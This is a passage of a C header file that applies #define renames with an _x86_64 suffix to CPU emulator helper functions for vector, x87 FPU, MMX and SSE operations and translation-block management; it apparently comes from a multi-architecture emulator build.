#define helper_gvec_sssub8 helper_gvec_sssub8_x86_64 #define helper_gvec_sssub16 helper_gvec_sssub16_x86_64 #define helper_gvec_sssub32 helper_gvec_sssub32_x86_64 #define helper_gvec_sssub64 helper_gvec_sssub64_x86_64 #define helper_gvec_usadd8 helper_gvec_usadd8_x86_64 #define helper_gvec_usadd16 helper_gvec_usadd16_x86_64 #define helper_gvec_usadd32 helper_gvec_usadd32_x86_64 #define helper_gvec_usadd64 helper_gvec_usadd64_x86_64 #define helper_gvec_ussub8 helper_gvec_ussub8_x86_64 #define helper_gvec_ussub16 helper_gvec_ussub16_x86_64 #define helper_gvec_ussub32 helper_gvec_ussub32_x86_64 #define helper_gvec_ussub64 helper_gvec_ussub64_x86_64 #define helper_gvec_smin8 helper_gvec_smin8_x86_64 #define helper_gvec_smin16 helper_gvec_smin16_x86_64 #define helper_gvec_smin32 helper_gvec_smin32_x86_64 #define helper_gvec_smin64 helper_gvec_smin64_x86_64 #define helper_gvec_smax8 helper_gvec_smax8_x86_64 #define helper_gvec_smax16 helper_gvec_smax16_x86_64 #define helper_gvec_smax32 helper_gvec_smax32_x86_64 #define helper_gvec_smax64 helper_gvec_smax64_x86_64 #define helper_gvec_umin8 helper_gvec_umin8_x86_64 #define helper_gvec_umin16 helper_gvec_umin16_x86_64 #define helper_gvec_umin32 helper_gvec_umin32_x86_64 #define helper_gvec_umin64 helper_gvec_umin64_x86_64 #define helper_gvec_umax8 helper_gvec_umax8_x86_64 #define helper_gvec_umax16 helper_gvec_umax16_x86_64 #define helper_gvec_umax32 helper_gvec_umax32_x86_64 #define helper_gvec_umax64 helper_gvec_umax64_x86_64 #define helper_gvec_bitsel helper_gvec_bitsel_x86_64 #define cpu_restore_state cpu_restore_state_x86_64 #define page_collection_lock page_collection_lock_x86_64 #define page_collection_unlock page_collection_unlock_x86_64 #define free_code_gen_buffer free_code_gen_buffer_x86_64 #define tcg_exec_init tcg_exec_init_x86_64 #define tb_cleanup tb_cleanup_x86_64 #define tb_flush tb_flush_x86_64 #define tb_phys_invalidate tb_phys_invalidate_x86_64 #define tb_gen_code tb_gen_code_x86_64 #define tb_exec_lock tb_exec_lock_x86_64 #define tb_exec_unlock tb_exec_unlock_x86_64 #define tb_invalidate_phys_page_range tb_invalidate_phys_page_range_x86_64 #define tb_invalidate_phys_range tb_invalidate_phys_range_x86_64 #define tb_invalidate_phys_page_fast tb_invalidate_phys_page_fast_x86_64 #define tb_check_watchpoint tb_check_watchpoint_x86_64 #define cpu_io_recompile cpu_io_recompile_x86_64 #define tb_flush_jmp_cache tb_flush_jmp_cache_x86_64 #define tcg_flush_softmmu_tlb tcg_flush_softmmu_tlb_x86_64 #define translator_loop_temp_check translator_loop_temp_check_x86_64 #define translator_loop translator_loop_x86_64 #define helper_atomic_cmpxchgo_le_mmu helper_atomic_cmpxchgo_le_mmu_x86_64 #define helper_atomic_cmpxchgo_be_mmu helper_atomic_cmpxchgo_be_mmu_x86_64 #define helper_atomic_ldo_le_mmu helper_atomic_ldo_le_mmu_x86_64 #define helper_atomic_ldo_be_mmu helper_atomic_ldo_be_mmu_x86_64 #define helper_atomic_sto_le_mmu helper_atomic_sto_le_mmu_x86_64 #define helper_atomic_sto_be_mmu helper_atomic_sto_be_mmu_x86_64 #define unassigned_mem_ops unassigned_mem_ops_x86_64 #define floatx80_infinity floatx80_infinity_x86_64 #define dup_const_func dup_const_func_x86_64 #define gen_helper_raise_exception gen_helper_raise_exception_x86_64 #define gen_helper_raise_interrupt gen_helper_raise_interrupt_x86_64 #define gen_helper_vfp_get_fpscr gen_helper_vfp_get_fpscr_x86_64 #define gen_helper_vfp_set_fpscr gen_helper_vfp_set_fpscr_x86_64 #define gen_helper_cpsr_read gen_helper_cpsr_read_x86_64 #define gen_helper_cpsr_write gen_helper_cpsr_write_x86_64 #define tlb_reset_dirty_by_vaddr tlb_reset_dirty_by_vaddr_x86_64 #define cpu_get_tsc cpu_get_tsc_x86_64 #define x86_cpu_get_memory_mapping x86_cpu_get_memory_mapping_x86_64 #define cpu_x86_update_dr7 cpu_x86_update_dr7_x86_64 #define breakpoint_handler breakpoint_handler_x86_64 #define helper_single_step helper_single_step_x86_64 #define helper_rechecking_single_step helper_rechecking_single_step_x86_64 #define helper_set_dr helper_set_dr_x86_64 #define helper_get_dr helper_get_dr_x86_64 #define helper_bpt_io helper_bpt_io_x86_64 #define helper_cc_compute_all helper_cc_compute_all_x86_64 #define cpu_cc_compute_all cpu_cc_compute_all_x86_64 #define helper_cc_compute_c helper_cc_compute_c_x86_64 #define helper_write_eflags helper_write_eflags_x86_64 #define helper_read_eflags helper_read_eflags_x86_64 #define helper_clts helper_clts_x86_64 #define helper_reset_rf helper_reset_rf_x86_64 #define helper_cli helper_cli_x86_64 #define helper_sti helper_sti_x86_64 #define helper_clac helper_clac_x86_64 #define helper_stac helper_stac_x86_64 #define get_register_name_32 get_register_name_32_x86_64 #define host_cpuid host_cpuid_x86_64 #define host_vendor_fms host_vendor_fms_x86_64 #define x86_cpu_set_default_version x86_cpu_set_default_version_x86_64 #define cpu_clear_apic_feature cpu_clear_apic_feature_x86_64 #define cpu_x86_cpuid cpu_x86_cpuid_x86_64 #define x86_cpu_pending_interrupt x86_cpu_pending_interrupt_x86_64 #define x86_update_hflags x86_update_hflags_x86_64 #define cpu_x86_init cpu_x86_init_x86_64 #define helper_raise_interrupt helper_raise_interrupt_x86_64 #define helper_raise_exception helper_raise_exception_x86_64 #define raise_interrupt raise_interrupt_x86_64 #define raise_exception_err raise_exception_err_x86_64 #define raise_exception_err_ra raise_exception_err_ra_x86_64 #define raise_exception raise_exception_x86_64 #define raise_exception_ra raise_exception_ra_x86_64 #define x86_cpu_tlb_fill x86_cpu_tlb_fill_x86_64 #define cpu_set_ignne cpu_set_ignne_x86_64 #define helper_flds_FT0 helper_flds_FT0_x86_64 #define helper_fldl_FT0 helper_fldl_FT0_x86_64 #define helper_fildl_FT0 helper_fildl_FT0_x86_64 #define helper_flds_ST0 helper_flds_ST0_x86_64 #define helper_fldl_ST0 helper_fldl_ST0_x86_64 #define helper_fildl_ST0 helper_fildl_ST0_x86_64 #define helper_fildll_ST0 helper_fildll_ST0_x86_64 #define helper_fsts_ST0 helper_fsts_ST0_x86_64 #define helper_fstl_ST0 helper_fstl_ST0_x86_64 #define helper_fist_ST0 helper_fist_ST0_x86_64 #define helper_fistl_ST0 helper_fistl_ST0_x86_64 #define helper_fistll_ST0 helper_fistll_ST0_x86_64 #define helper_fistt_ST0 helper_fistt_ST0_x86_64 #define helper_fisttl_ST0 helper_fisttl_ST0_x86_64 #define helper_fisttll_ST0 helper_fisttll_ST0_x86_64 #define helper_fldt_ST0 helper_fldt_ST0_x86_64 #define helper_fstt_ST0 helper_fstt_ST0_x86_64 #define helper_fpush helper_fpush_x86_64 #define helper_fpop helper_fpop_x86_64 #define helper_fdecstp helper_fdecstp_x86_64 #define helper_fincstp helper_fincstp_x86_64 #define helper_ffree_STN helper_ffree_STN_x86_64 #define helper_fmov_ST0_FT0 helper_fmov_ST0_FT0_x86_64 #define helper_fmov_FT0_STN helper_fmov_FT0_STN_x86_64 #define helper_fmov_ST0_STN helper_fmov_ST0_STN_x86_64 #define helper_fmov_STN_ST0 helper_fmov_STN_ST0_x86_64 #define helper_fxchg_ST0_STN helper_fxchg_ST0_STN_x86_64 #define helper_fcom_ST0_FT0 helper_fcom_ST0_FT0_x86_64 #define helper_fucom_ST0_FT0 helper_fucom_ST0_FT0_x86_64 #define helper_fcomi_ST0_FT0 helper_fcomi_ST0_FT0_x86_64 #define helper_fucomi_ST0_FT0 helper_fucomi_ST0_FT0_x86_64 #define helper_fadd_ST0_FT0 helper_fadd_ST0_FT0_x86_64 #define helper_fmul_ST0_FT0 helper_fmul_ST0_FT0_x86_64 #define helper_fsub_ST0_FT0 helper_fsub_ST0_FT0_x86_64 #define helper_fsubr_ST0_FT0 helper_fsubr_ST0_FT0_x86_64 #define helper_fdiv_ST0_FT0 helper_fdiv_ST0_FT0_x86_64 #define helper_fdivr_ST0_FT0 helper_fdivr_ST0_FT0_x86_64 #define helper_fadd_STN_ST0 helper_fadd_STN_ST0_x86_64 #define helper_fmul_STN_ST0 helper_fmul_STN_ST0_x86_64 #define helper_fsub_STN_ST0 helper_fsub_STN_ST0_x86_64 #define helper_fsubr_STN_ST0 helper_fsubr_STN_ST0_x86_64 #define helper_fdiv_STN_ST0 helper_fdiv_STN_ST0_x86_64 #define helper_fdivr_STN_ST0 helper_fdivr_STN_ST0_x86_64 #define helper_fchs_ST0 helper_fchs_ST0_x86_64 #define helper_fabs_ST0 helper_fabs_ST0_x86_64 #define helper_fld1_ST0 helper_fld1_ST0_x86_64 #define helper_fldl2t_ST0 helper_fldl2t_ST0_x86_64 #define helper_fldl2e_ST0 helper_fldl2e_ST0_x86_64 #define helper_fldpi_ST0 helper_fldpi_ST0_x86_64 #define helper_fldlg2_ST0 helper_fldlg2_ST0_x86_64 #define helper_fldln2_ST0 helper_fldln2_ST0_x86_64 #define helper_fldz_ST0 helper_fldz_ST0_x86_64 #define helper_fldz_FT0 helper_fldz_FT0_x86_64 #define helper_fnstsw helper_fnstsw_x86_64 #define helper_fnstcw helper_fnstcw_x86_64 #define update_fp_status update_fp_status_x86_64 #define helper_fldcw helper_fldcw_x86_64 #define helper_fclex helper_fclex_x86_64 #define helper_fwait helper_fwait_x86_64 #define helper_fninit helper_fninit_x86_64 #define helper_fbld_ST0 helper_fbld_ST0_x86_64 #define helper_fbst_ST0 helper_fbst_ST0_x86_64 #define helper_f2xm1 helper_f2xm1_x86_64 #define helper_fyl2x helper_fyl2x_x86_64 #define helper_fptan helper_fptan_x86_64 #define helper_fpatan helper_fpatan_x86_64 #define helper_fxtract helper_fxtract_x86_64 #define helper_fprem1 helper_fprem1_x86_64 #define helper_fprem helper_fprem_x86_64 #define helper_fyl2xp1 helper_fyl2xp1_x86_64 #define helper_fsqrt helper_fsqrt_x86_64 #define helper_fsincos helper_fsincos_x86_64 #define helper_frndint helper_frndint_x86_64 #define helper_fscale helper_fscale_x86_64 #define helper_fsin helper_fsin_x86_64 #define helper_fcos helper_fcos_x86_64 #define helper_fxam_ST0 helper_fxam_ST0_x86_64 #define helper_fstenv helper_fstenv_x86_64 #define helper_fldenv helper_fldenv_x86_64 #define helper_fsave helper_fsave_x86_64 #define helper_frstor helper_frstor_x86_64 #define helper_fxsave helper_fxsave_x86_64 #define helper_xsave helper_xsave_x86_64 #define helper_xsaveopt helper_xsaveopt_x86_64 #define helper_fxrstor helper_fxrstor_x86_64 #define helper_xrstor helper_xrstor_x86_64 #define helper_xgetbv helper_xgetbv_x86_64 #define helper_xsetbv helper_xsetbv_x86_64 #define update_mxcsr_status update_mxcsr_status_x86_64 #define helper_ldmxcsr helper_ldmxcsr_x86_64 #define helper_enter_mmx helper_enter_mmx_x86_64 #define helper_emms helper_emms_x86_64 #define helper_movq helper_movq_x86_64 #define helper_psrlw_mmx helper_psrlw_mmx_x86_64 #define helper_psraw_mmx helper_psraw_mmx_x86_64 #define helper_psllw_mmx helper_psllw_mmx_x86_64 #define helper_psrld_mmx helper_psrld_mmx_x86_64 #define helper_psrad_mmx helper_psrad_mmx_x86_64 #define helper_pslld_mmx helper_pslld_mmx_x86_64 #define helper_psrlq_mmx helper_psrlq_mmx_x86_64 #define helper_psllq_mmx helper_psllq_mmx_x86_64 #define helper_paddb_mmx helper_paddb_mmx_x86_64 #define helper_paddw_mmx helper_paddw_mmx_x86_64 #define helper_paddl_mmx helper_paddl_mmx_x86_64 #define helper_paddq_mmx helper_paddq_mmx_x86_64 #define helper_psubb_mmx helper_psubb_mmx_x86_64 #define helper_psubw_mmx helper_psubw_mmx_x86_64 #define helper_psubl_mmx helper_psubl_mmx_x86_64 #define helper_psubq_mmx helper_psubq_mmx_x86_64 #define helper_paddusb_mmx helper_paddusb_mmx_x86_64 #define helper_paddsb_mmx helper_paddsb_mmx_x86_64 #define helper_psubusb_mmx helper_psubusb_mmx_x86_64 #define helper_psubsb_mmx helper_psubsb_mmx_x86_64 #define helper_paddusw_mmx helper_paddusw_mmx_x86_64 #define helper_paddsw_mmx helper_paddsw_mmx_x86_64 #define helper_psubusw_mmx helper_psubusw_mmx_x86_64 #define helper_psubsw_mmx helper_psubsw_mmx_x86_64 #define helper_pminub_mmx helper_pminub_mmx_x86_64 #define helper_pmaxub_mmx helper_pmaxub_mmx_x86_64 #define helper_pminsw_mmx helper_pminsw_mmx_x86_64 #define helper_pmaxsw_mmx helper_pmaxsw_mmx_x86_64 #define helper_pand_mmx helper_pand_mmx_x86_64 #define helper_pandn_mmx helper_pandn_mmx_x86_64 #define helper_por_mmx helper_por_mmx_x86_64 #define helper_pxor_mmx helper_pxor_mmx_x86_64 #define helper_pcmpgtb_mmx helper_pcmpgtb_mmx_x86_64 #define helper_pcmpgtw_mmx helper_pcmpgtw_mmx_x86_64 #define helper_pcmpgtl_mmx helper_pcmpgtl_mmx_x86_64 #define helper_pcmpeqb_mmx helper_pcmpeqb_mmx_x86_64 #define helper_pcmpeqw_mmx helper_pcmpeqw_mmx_x86_64 #define helper_pcmpeql_mmx helper_pcmpeql_mmx_x86_64 #define helper_pmullw_mmx helper_pmullw_mmx_x86_64 #define helper_pmulhrw_mmx helper_pmulhrw_mmx_x86_64 #define helper_pmulhuw_mmx helper_pmulhuw_mmx_x86_64 #define helper_pmulhw_mmx helper_pmulhw_mmx_x86_64 #define helper_pavgb_mmx helper_pavgb_mmx_x86_64 #define helper_pavgw_mmx helper_pavgw_mmx_x86_64 #define helper_pmuludq_mmx helper_pmuludq_mmx_x86_64 #define helper_pmaddwd_mmx helper_pmaddwd_mmx_x86_64 #define helper_psadbw_mmx helper_psadbw_mmx_x86_64 #define helper_maskmov_mmx helper_maskmov_mmx_x86_64 #define helper_movl_mm_T0_mmx helper_movl_mm_T0_mmx_x86_64 #define helper_movq_mm_T0_mmx helper_movq_mm_T0_mmx_x86_64 #define helper_pshufw_mmx helper_pshufw_mmx_x86_64 #define helper_pmovmskb_mmx helper_pmovmskb_mmx_x86_64 #define helper_packsswb_mmx helper_packsswb_mmx_x86_64 #define helper_packuswb_mmx helper_packuswb_mmx_x86_64 #define helper_packssdw_mmx helper_packssdw_mmx_x86_64 #define helper_punpcklbw_mmx helper_punpcklbw_mmx_x86_64 #define helper_punpcklwd_mmx helper_punpcklwd_mmx_x86_64 #define helper_punpckldq_mmx helper_punpckldq_mmx_x86_64 #define helper_punpckhbw_mmx helper_punpckhbw_mmx_x86_64 #define helper_punpckhwd_mmx helper_punpckhwd_mmx_x86_64 #define helper_punpckhdq_mmx helper_punpckhdq_mmx_x86_64 #define helper_pi2fd helper_pi2fd_x86_64 #define helper_pi2fw helper_pi2fw_x86_64 #define helper_pf2id helper_pf2id_x86_64 #define helper_pf2iw helper_pf2iw_x86_64 #define helper_pfacc helper_pfacc_x86_64 #define helper_pfadd helper_pfadd_x86_64 #define helper_pfcmpeq helper_pfcmpeq_x86_64 #define helper_pfcmpge helper_pfcmpge_x86_64 #define helper_pfcmpgt helper_pfcmpgt_x86_64 #define helper_pfmax helper_pfmax_x86_64 #define helper_pfmin helper_pfmin_x86_64 #define helper_pfmul helper_pfmul_x86_64 #define helper_pfnacc helper_pfnacc_x86_64 #define helper_pfpnacc helper_pfpnacc_x86_64 #define helper_pfrcp helper_pfrcp_x86_64 #define helper_pfrsqrt helper_pfrsqrt_x86_64 #define helper_pfsub helper_pfsub_x86_64 #define helper_pfsubr helper_pfsubr_x86_64 #define helper_pswapd helper_pswapd_x86_64 #define helper_pshufb_mmx helper_pshufb_mmx_x86_64 #define helper_phaddw_mmx helper_phaddw_mmx_x86_64 #define helper_phaddd_mmx helper_phaddd_mmx_x86_64 #define helper_phaddsw_mmx helper_phaddsw_mmx_x86_64 #define helper_pmaddubsw_mmx helper_pmaddubsw_mmx_x86_64 #define helper_phsubw_mmx helper_phsubw_mmx_x86_64 #define helper_phsubd_mmx helper_phsubd_mmx_x86_64 #define helper_phsubsw_mmx helper_phsubsw_mmx_x86_64 #define helper_pabsb_mmx helper_pabsb_mmx_x86_64 #define helper_pabsw_mmx helper_pabsw_mmx_x86_64 #define helper_pabsd_mmx helper_pabsd_mmx_x86_64 #define helper_pmulhrsw_mmx helper_pmulhrsw_mmx_x86_64 #define helper_psignb_mmx helper_psignb_mmx_x86_64 #define helper_psignw_mmx helper_psignw_mmx_x86_64 #define helper_psignd_mmx helper_psignd_mmx_x86_64 #define helper_palignr_mmx helper_palignr_mmx_x86_64 #define helper_psrlw_xmm helper_psrlw_xmm_x86_64 #define helper_psraw_xmm helper_psraw_xmm_x86_64 #define helper_psllw_xmm helper_psllw_xmm_x86_64 #define helper_psrld_xmm helper_psrld_xmm_x86_64 #define helper_psrad_xmm helper_psrad_xmm_x86_64 #define helper_pslld_xmm helper_pslld_xmm_x86_64 #define helper_psrlq_xmm helper_psrlq_xmm_x86_64 #define helper_psllq_xmm helper_psllq_xmm_x86_64 #define helper_psrldq_xmm helper_psrldq_xmm_x86_64 #define helper_pslldq_xmm helper_pslldq_xmm_x86_64 #define helper_paddb_xmm helper_paddb_xmm_x86_64 #define helper_paddw_xmm helper_paddw_xmm_x86_64 #define helper_paddl_xmm helper_paddl_xmm_x86_64 #define helper_paddq_xmm helper_paddq_xmm_x86_64 #define helper_psubb_xmm helper_psubb_xmm_x86_64 #define helper_psubw_xmm helper_psubw_xmm_x86_64 #define helper_psubl_xmm helper_psubl_xmm_x86_64 #define helper_psubq_xmm helper_psubq_xmm_x86_64 #define helper_paddusb_xmm helper_paddusb_xmm_x86_64 #define helper_paddsb_xmm helper_paddsb_xmm_x86_64 #define helper_psubusb_xmm helper_psubusb_xmm_x86_64 #define helper_psubsb_xmm helper_psubsb_xmm_x86_64 #define helper_paddusw_xmm helper_paddusw_xmm_x86_64 #define helper_paddsw_xmm helper_paddsw_xmm_x86_64 #define helper_psubusw_xmm helper_psubusw_xmm_x86_64 #define helper_psubsw_xmm helper_psubsw_xmm_x86_64 #define helper_pminub_xmm helper_pminub_xmm_x86_64 #define helper_pmaxub_xmm helper_pmaxub_xmm_x86_64 #define helper_pminsw_xmm helper_pminsw_xmm_x86_64 #define helper_pmaxsw_xmm helper_pmaxsw_xmm_x86_64 #define helper_pand_xmm helper_pand_xmm_x86_64 #define helper_pandn_xmm helper_pandn_xmm_x86_64 #define helper_por_xmm helper_por_xmm_x86_64 #define helper_pxor_xmm helper_pxor_xmm_x86_64 #define helper_pcmpgtb_xmm helper_pcmpgtb_xmm_x86_64 #define helper_pcmpgtw_xmm helper_pcmpgtw_xmm_x86_64 #define helper_pcmpgtl_xmm helper_pcmpgtl_xmm_x86_64 #define helper_pcmpeqb_xmm helper_pcmpeqb_xmm_x86_64 #define helper_pcmpeqw_xmm helper_pcmpeqw_xmm_x86_64 #define helper_pcmpeql_xmm helper_pcmpeql_xmm_x86_64 #define helper_pmullw_xmm helper_pmullw_xmm_x86_64 #define helper_pmulhuw_xmm helper_pmulhuw_xmm_x86_64 #define helper_pmulhw_xmm helper_pmulhw_xmm_x86_64 #define helper_pavgb_xmm helper_pavgb_xmm_x86_64 #define helper_pavgw_xmm helper_pavgw_xmm_x86_64 #define helper_pmuludq_xmm helper_pmuludq_xmm_x86_64 #define helper_pmaddwd_xmm helper_pmaddwd_xmm_x86_64 #define helper_psadbw_xmm helper_psadbw_xmm_x86_64 #define helper_maskmov_xmm helper_maskmov_xmm_x86_64 #define helper_movl_mm_T0_xmm helper_movl_mm_T0_xmm_x86_64 #define helper_movq_mm_T0_xmm helper_movq_mm_T0_xmm_x86_64 #define helper_shufps helper_shufps_x86_64 #define helper_shufpd helper_shufpd_x86_64 #define helper_pshufd_xmm helper_pshufd_xmm_x86_64 #define helper_pshuflw_xmm helper_pshuflw_xmm_x86_64 #define helper_pshufhw_xmm helper_pshufhw_xmm_x86_64 #define helper_addps helper_addps_x86_64 #define helper_addss helper_addss_x86_64 #define helper_addpd helper_addpd_x86_64 #define helper_addsd helper_addsd_x86_64 #define helper_subps helper_subps_x86_64 #define helper_subss helper_subss_x86_64 #define helper_subpd helper_subpd_x86_64 #define helper_subsd helper_subsd_x86_64 #define helper_mulps helper_mulps_x86_64 #define helper_mulss helper_mulss_x86_64 #define helper_mulpd helper_mulpd_x86_64 #define helper_mulsd helper_mulsd_x86_64 #define helper_divps helper_divps_x86_64 #define helper_divss helper_divss_x86_64 #define helper_divpd helper_divpd_x86_64 #define helper_divsd helper_divsd_x86_64 #define helper_minps helper_minps_x86_64 #define helper_minss helper_minss_x86_64 #define helper_minpd helper_minpd_x86_64 #define helper_minsd helper_minsd_x86_64 #define helper_maxps helper_maxps_x86_64 #define helper_maxss helper_maxss_x86_64 #define helper_maxpd helper_maxpd_x86_64 #define helper_maxsd helper_maxsd_x86_64 #define helper_sqrtps helper_sqrtps_x86_64 #define helper_sqrtss helper_sqrtss_x86_64 #define helper_sqrtpd helper_sqrtpd_x86_64 #define helper_sqrtsd helper_sqrtsd_x86_64 #define helper_cvtps2pd helper_cvtps2pd_x86_64 #define helper_cvtpd2ps helper_cvtpd2ps_x86_64 #define helper_cvtss2sd helper_cvtss2sd_x86_64 #define helper_cvtsd2ss helper_cvtsd2ss_x86_64 #define helper_cvtdq2ps helper_cvtdq2ps_x86_64 #define helper_cvtdq2pd helper_cvtdq2pd_x86_64 #define helper_cvtpi2ps helper_cvtpi2ps_x86_64 #define helper_cvtpi2pd helper_cvtpi2pd_x86_64 #define helper_cvtsi2ss helper_cvtsi2ss_x86_64 #define helper_cvtsi2sd helper_cvtsi2sd_x86_64 #define helper_cvtsq2ss helper_cvtsq2ss_x86_64 #define helper_cvtsq2sd helper_cvtsq2sd_x86_64 #define helper_cvtps2dq helper_cvtps2dq_x86_64 #define helper_cvtpd2dq helper_cvtpd2dq_x86_64 #define helper_cvtps2pi helper_cvtps2pi_x86_64 #define helper_cvtpd2pi helper_cvtpd2pi_x86_64 #define helper_cvtss2si helper_cvtss2si_x86_64 #define helper_cvtsd2si helper_cvtsd2si_x86_64 #define helper_cvtss2sq helper_cvtss2sq_x86_64 #define helper_cvtsd2sq helper_cvtsd2sq_x86_64 #define helper_cvttps2dq helper_cvttps2dq_x86_64 #define helper_cvttpd2dq helper_cvttpd2dq_x86_64 #define helper_cvttps2pi helper_cvttps2pi_x86_64 #define helper_cvttpd2pi helper_cvttpd2pi_x86_64 #define helper_cvttss2si helper_cvttss2si_x86_64 #define helper_cvttsd2si helper_cvttsd2si_x86_64 #define helper_cvttss2sq helper_cvttss2sq_x86_64 #define helper_cvttsd2sq helper_cvttsd2sq_x86_64 #define helper_rsqrtps helper_rsqrtps_x86_64 #define helper_rsqrtss helper_rsqrtss_x86_64 #define helper_rcpps helper_rcpps_x86_64 #define helper_rcpss helper_rcpss_x86_64 #define helper_extrq_r helper_extrq_r_x86_64 #define helper_extrq_i helper_extrq_i_x86_64 #define helper_insertq_r helper_insertq_r_x86_64 #define helper_insertq_i helper_insertq_i_x86_64 #define helper_haddps helper_haddps_x86_64 #define helper_haddpd helper_haddpd_x86_64 #define helper_hsubps helper_hsubps_x86_64 #define helper_hsubpd helper_hsubpd_x86_64 #define helper_addsubps helper_addsubps_x86_64 #define helper_addsubpd helper_addsubpd_x86_64 #define helper_cmpeqps helper_cmpeqps_x86_64 #define helper_cmpeqss helper_cmpeqss_x86_64 #define helper_cmpeqpd helper_cmpeqpd_x86_64 #define helper_cmpeqsd helper_cmpeqsd_x86_64 #define helper_cmpltps helper_cmpltps_x86_64 #define helper_cmpltss helper_cmpltss_x86_64 #define helper_cmpltpd helper_cmpltpd_x86_64 #define helper_cmpltsd helper_cmpltsd_x86_64 #define helper_cmpleps helper_cmpleps_x86_64 #define helper_cmpless helper_cmpless_x86_64 #define helper_cmplepd helper_cmplepd_x86_64 #define helper_cmplesd helper_cmplesd_x86_64 #define helper_cmpunordps helper_cmpunordps_x86_64 #define helper_cmpunordss helper_cmpunordss_x86_64 #define helper_cmpunordpd helper_cmpunordpd_x86_64 #define helper_cmpunordsd helper_cmpunordsd_x86_64 #define helper_cmpneqps helper_cmpneqps_x86_64 #define helper_cmpneqss helper_cmpneqss_x86_64 #define helper_cmpneqpd helper_cmpneqpd_x86_64 #define helper_cmpneqsd helper_cmpneqsd_x86_64 #define helper_cmpnltps helper_cmpnltps_x86_64 #define helper_cmpnltss helper_cmpnltss_x86_64 #define helper_cmpnltpd helper_cmpnltpd_x86_64 #define helper_cmpnltsd helper_cmpnltsd_x86_64 #define helper_cmpnleps helper_cmpnleps_x86_64 #define helper_cmpnless helper_cmpnless_x86_64 #define helper_cmpnlepd helper_cmpnlepd_x86_64 #define helper_cmpnlesd helper_cmpnlesd_x86_64 #define helper_cmpordps helper_cmpordps_x86_64 #define helper_cmpordss helper_cmpordss_x86_64 #define helper_cmpordpd helper_cmpordpd_x86_64 #define helper_cmpordsd helper_cmpordsd_x86_64 #define helper_ucomiss helper_ucomiss_x86_64 #define helper_comiss helper_comiss_x86_64 #define helper_ucomisd helper_ucomisd_x86_64 #define helper_comisd helper_comisd_x86_64 #define helper_movmskps helper_movmskps_x86_64 #define helper_movmskpd helper_movmskpd_x86_64 #define helper_pmovmskb_xmm helper_pmovmskb_xmm_x86_64 #define helper_packsswb_xmm helper_packsswb_xmm_x86_64 #define helper_packuswb_xmm helper_packuswb_xmm_x86_64 #define helper_packssdw_xmm helper_packssdw_xmm_x86_64 #define helper_punpcklbw_xmm helper_punpcklbw_xmm_x86_64 #define helper_punpcklwd_xmm helper_punpcklwd_xmm_x86_64 #define helper_punpckldq_xmm helper_punpckldq_xmm_x86_64 #define helper_punpcklqdq_xmm helper_punpcklqdq_xmm_x86_64 #define helper_punpckhbw_xmm helper_punpckhbw_xmm_x86_64 #define helper_punpckhwd_xmm helper_punpckhwd_xmm_x86_64 #define helper_punpckhdq_xmm helper_punpckhdq_xmm_x86_64 #define helper_punpckhqdq_xmm helper_punpckhqdq_xmm_x86_64 #define helper_pshufb_xmm helper_pshufb_xmm_x86_64 #define helper_phaddw_xmm helper_phaddw_xmm_x86_64 #define helper_phaddd_xmm helper_phaddd_xmm_x86_64 #define helper_phaddsw_xmm helper_phaddsw_xmm_x86_64 #define helper_pmaddubsw_xmm helper_pmaddubsw_xmm_x86_64 #define helper_phsubw_xmm helper_phsubw_xmm_x86_64 #define helper_phsubd_xmm helper_phsubd_xmm_x86_64 #define helper_phsubsw_xmm helper_phsubsw_xmm_x86_64 #define helper_pabsb_xmm helper_pabsb_xmm_x86_64 #define helper_pabsw_xmm helper_pabsw_xmm_x86_64 #define helper_pabsd_xmm helper_pabsd_xmm_x86_64 #define helper_pmulhrsw_xmm helper_pmulhrsw_xmm_x86_64 #define helper_psignb_xmm helper_psignb_xmm_x86_64 #define helper_psignw_xmm helper_psignw_xmm_x86_64 #define helper_psignd_xmm helper_psignd_xmm_x86_64 #define helper_palignr_xmm helper_palignr_xmm_x86_64 #define helper_pblendvb_xmm helper_pblendvb_xmm_x86_64 #define helper_blendvps_xmm helper_blendvps_xmm_x86_64 #define helper_blendvpd_xmm helper_blendvpd_xmm_x86_64 #define helper_ptest_xmm helper_ptest_xmm_x86_64 #define helper_pmovsxbw_xmm helper_pmovsxbw_xmm_x86_64 #define helper_pmovsxbd_xmm helper_pmovsxbd_xmm_x86_64 #define helper_pmovsxbq_xmm helper_pmovsxbq_xmm_x86_64 #define helper_pmovsxwd_xmm helper_pmovsxwd_xmm_x86_64 #define helper_pmovsxwq_xmm helper_pmovsxwq_xmm_x86_64 #define helper_pmovsxdq_xmm helper_pmovsxdq_xmm_x86_64 #define helper_pmovzxbw_xmm helper_pmovzxbw_xmm_x86_64 #define helper_pmovzxbd_xmm helper_pmovzxbd_xmm_x86_64 #define helper_pmovzxbq_xmm helper_pmovzxbq_xmm_x86_64 #define helper_pmovzxwd_xmm helper_pmovzxwd_xmm_x86_64 #define helper_pmovzxwq_xmm helper_pmovzxwq_xmm_x86_64 #define helper_pmovzxdq_xmm helper_pmovzxdq_xmm_x86_64 #define helper_pmuldq_xmm helper_pmuldq_xmm_x86_64 #define helper_pcmpeqq_xmm helper_pcmpeqq_xmm_x86_64 #define helper_packusdw_xmm helper_packusdw_xmm_x86_64 #define helper_pminsb_xmm helper_pminsb_xmm_x86_64 #define helper_pminsd_xmm helper_pminsd_xmm_x86_64 #define helper_pminuw_xmm helper_pminuw_xmm_x86_64 #define helper_pminud_xmm helper_pminud_xmm_x86_64 #define helper_pmaxsb_xmm helper_pmaxsb_xmm_x86_64 #define helper_pmaxsd_xmm helper_pmaxsd_xmm_x86_64 #define helper_pmaxuw_xmm helper_pmaxuw_xmm_x86_64 #define helper_pmaxud_xmm helper_pmaxud_xmm_x86_64 #define helper_pmulld_xmm helper_pmulld_xmm_x86_64 #define helper_phminposuw_xmm helper_phminposuw_xmm_x86_64 #define helper_roundps_xmm helper_roundps_xmm_x86_64 #define helper_roundpd_xmm helper_roundpd_xmm_x86_64 #define helper_roundss_xmm helper_roundss_xmm_x86_64 #define helper_roundsd_xmm helper_roundsd_xmm_x86_64 #define helper_blendps_xmm helper_blendps_xmm_x86_64 #define helper_blendpd_xmm helper_blendpd_xmm_x86_64 #define helper_pblendw_xmm helper_pblendw_xmm_x86_64 #define helper_dpps_xmm helper_dpps_xmm_x86_64 #define helper_dppd_xmm helper_dppd_xmm_x86_64 #define helper_mpsadbw_xmm helper_mpsadbw_xmm_x86_64 #define helper_pcmpgtq_xmm helper_pcmpgtq_xmm_x86_64 #define helper_pcmpestri_xmm helper_pcmpestri_xmm_x86_64 #define helper_pcmpestrm_xmm helper_pcmpestrm_xmm_x86_64 #define helper_pcmpistri_xmm 